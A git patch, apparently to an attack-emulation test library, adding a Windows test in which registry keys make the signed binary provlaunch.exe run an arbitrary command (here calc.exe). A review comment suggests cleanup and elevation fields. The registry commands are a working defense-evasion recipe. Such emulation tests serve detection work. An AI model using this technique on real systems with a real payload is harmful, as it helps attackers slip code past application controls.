From 2dc70561dd5b5ef20f1e58c4b6d4801751d0f7fc Mon Sep 17 00:00:00 2001
From: Tuutaans <69729332+Tuutaans@users.noreply.github.com>
Date: Fri, 29 Sep 2023 20:29:32 +0545
Subject: [PATCH] Provlaunch.exe Executes Arbitrary Command via Registry Key (#2546)

Co-authored-by: Carrie Roberts
---
 atomics/T1218/T1218.yaml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 9c2a5fc5..e00e82bd 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -349,4 +349,18 @@ atomic_tests:
     cleanup_command: |
       Remove-Item -Path #{dest_path} -Recurse -Force
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
+  description: |
+    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+    - https://twitter.com/0gtweet/status/1674399582162153472
+    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+    Registry keys are deleted after successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+      reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+      c:\windows\system32\provlaunch.exe LOLBin
+    name: command_prompt
\ No newline at end of file
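Review bot: The new test's executor writes under HKLM but declares neither `elevation_required: true` nor a `cleanup_command`, unlike the preceding test in the hunk context, which carries both. The description's "Registry keys are deleted after successful execution" presumably refers to provlaunch.exe removing them itself, but if the reg add fails for lack of elevation or provlaunch.exe exits early, the LOLBin subtree persists on the test host and the next run of the test silently inherits stale values. Adding `cleanup_command: |` followed by `reg delete HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin /f >nul 2>&1` and `elevation_required: true` after `name: command_prompt` would make the test self-contained and keep it consistent with the existing entry. The mixed `reg.exe add` / `reg add` spelling on the two setup lines is harmless but worth unifying.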